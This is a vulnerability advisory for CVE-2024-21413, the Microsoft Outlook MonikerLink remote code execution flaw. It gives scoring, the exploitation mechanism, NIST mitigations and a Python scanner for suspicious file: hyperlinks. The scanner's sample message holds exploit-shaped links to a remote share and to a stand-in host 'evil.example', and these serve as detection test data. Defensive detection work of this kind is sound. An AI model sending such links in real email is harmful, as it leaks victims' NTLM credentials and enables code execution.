CVE-2024-21413
Published: 13 February 2024
Summary
CVE-2024-21413 is a critical-severity remote code execution vulnerability in Microsoft Outlook, classed as Improper Input Validation (CWE-20); the affected product listed here is Microsoft Office 2016. Its CVSS 3.1 base score is 9.8 (Critical), vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.
Operationally, it ranks in the top 0.2% of CVEs by EPSS exploit likelihood, CISA has added it to the Known Exploited Vulnerabilities (KEV) catalog, and a public proof-of-concept is referenced.
The strongest mitigations our analysis identified are NIST 800-53 SI-2 (Flaw Remediation) and SI-10 (Information Input Validation).
Deeper analysis
Microsoft Outlook contains a remote code execution vulnerability, CVE-2024-21413, that arises from improper input validation (CWE-20) in its handling of MonikerLink hyperlinks: a file:// link whose target path is followed by a "!" character is handed to the moniker parser instead of going through Outlook's usual hyperlink security prompt and Office Protected View. The flaw affects the Microsoft Outlook email client and received a CVSS 3.1 score of 9.8, reflecting a network attack vector with low complexity, no privileges and, per Microsoft's scoring, no user interaction; Microsoft states that the Preview Pane is an attack vector.
An unauthenticated remote attacker exploits the issue by sending an email that contains such a link. When the message is opened or previewed, Outlook follows the link to the attacker-controlled share, which exposes the victim's NTLM credentials, and the composite moniker can invoke a COM server such as Word to parse the remote file, the path to code execution described in Check Point's analysis. The result is complete loss of confidentiality, integrity, and availability on the affected system.
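The scanner below is an added example, not code from Microsoft, Check Point Research or Vicarius. It pulls every hyperlink out of an HTML message body and flags the link shape behind this bug: a file: URL whose path contains the "!" moniker separator, decoding percent-encoding first so that an obfuscated "%21" or "%5C" does not slip past. It also reports plain file: links to remote shares at lower severity, because those are the NTLM credential-leak path even when no "!" is present; that second rule, the sample message, the host names and the function names are all assumptions made for this example.

```python
"""
Heuristic scanner for CVE-2024-21413-style MonikerLink hyperlinks in an
HTML email body. Added example; not code from Microsoft, Check Point
Research or Vicarius. The sample message, hosts and names are constructed.
"""
import re
from dataclasses import dataclass
from html.parser import HTMLParser
from typing import List, Optional
from urllib.parse import unquote


@dataclass(frozen=True)
class Finding:
    href: str                # the raw href as it appeared in the message
    severity: str            # "high" = '!' moniker pattern, "medium" = remote file link
    reason: str
    unc_host: Optional[str]  # remote host Windows would authenticate to, if any


class _HrefCollector(HTMLParser):
    """Collect href values of <a> tags; HTMLParser already decodes HTML entities."""

    def __init__(self) -> None:
        super().__init__()
        self.hrefs: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "a":
            return
        for name, value in attrs:
            if name.lower() == "href" and value:
                self.hrefs.append(value)


def extract_hrefs(html_body: str) -> List[str]:
    collector = _HrefCollector()
    collector.feed(html_body)
    return collector.hrefs


_DRIVE_RE = re.compile(r"[A-Za-z]:")


def analyze_href(href: str) -> Optional[Finding]:
    """Classify one hyperlink. Returns None for links that do not use file:."""
    decoded = unquote(href.strip())  # undo %5C / %21 style obfuscation
    if not decoded.lower().startswith("file:"):
        return None
    # Accept file:\\host\..., file://host/... and file:///\\host\... alike:
    # drop the scheme and every leading slash or backslash.
    path = decoded[len("file:"):].lstrip("/\\")
    first = re.split(r"[\\/]", path, maxsplit=1)[0]
    # A leading drive letter means a local path; anything else is a host
    # (UNC share) that the client will try to authenticate to over SMB.
    unc_host = None if (not first or _DRIVE_RE.fullmatch(first)) else first
    if "!" in path:
        return Finding(href, "high",
                       "file: link with '!' moniker separator (CVE-2024-21413 pattern)",
                       unc_host)
    if unc_host:
        # Assumption for this example: a plain remote file link is not the
        # bug itself, but it is the NTLM-leak vector, so surface it for review.
        return Finding(href, "medium",
                       "file: link to a remote share (credential-leak review)",
                       unc_host)
    return None


def scan_message(html_body: str) -> List[Finding]:
    """Return findings for every hyperlink in an HTML message body, in order."""
    findings: List[Finding] = []
    for href in extract_hrefs(html_body):
        finding = analyze_href(href)
        if finding is not None:
            findings.append(finding)
    return findings


# Constructed sample message; hosts are documentation/example addresses.
SAMPLE_MESSAGE = r"""<html><body>
<p>Please review the invoice.</p>
<a href="https://example.com/invoice">View online</a>
<a href="file:///\\203.0.113.10\share\invoice.rtf!exploit">Open invoice</a>
<a href="file://intranet/docs/policy.docx">Policy</a>
<a href="FILE:///%5C%5Cevil.example%5Cs%5Cx.rtf%21abc">Obfuscated</a>
</body></html>"""


if __name__ == "__main__":
    for f in scan_message(SAMPLE_MESSAGE):
        print(f"[{f.severity}] {f.href} -> {f.reason} host={f.unc_host}")
```

Run against the constructed message, the scanner reports the "!" link and its percent-encoded twin as high, the bare intranet file link as medium, and ignores the HTTPS link; a local path with a drive letter is only reported when it carries the "!" separator. This is a triage heuristic for mail-flow or forensic review, not a substitute for the Microsoft patch.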
Microsoft has published official guidance and patches through its security update guide at msrc.microsoft.com. Additional technical analysis from Check Point Research describes the underlying moniker-link mechanism, while Vicarius has released corresponding detection and mitigation scripts.
The EPSS score currently stands at 0.9296 (an estimated 93% probability of exploitation activity in the next 30 days), with a recorded peak of 0.9350.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2024-19122
Vulnerability details
- Title: Microsoft Outlook Remote Code Execution Vulnerability
- CWE(s): CWE-20 (Improper Input Validation)
- KEV Date Added: 06 February 2025
Mitigating Controls (NIST 800-53 r5)
- SI-2 (Flaw Remediation): directly requires timely application of the vendor patches referenced in the MSRC advisory, removing the RCE flaw before exploitation. This is the only complete fix; the other controls reduce exposure but do not close the bug.
- SI-10 (Information Input Validation): addresses the CWE-20 root cause by requiring validation of untrusted input (here, hyperlinks in email content) that the vulnerable code fails to perform. In practice this validation lives in the vendor's patch; an operator can only approximate it by filtering file: hyperlinks at the mail gateway.
- SI-7 (Software, Firmware, and Information Integrity): requires integrity verification of software and incoming information, so that unauthorized code execution attempts via Outlook are blocked or at least detected.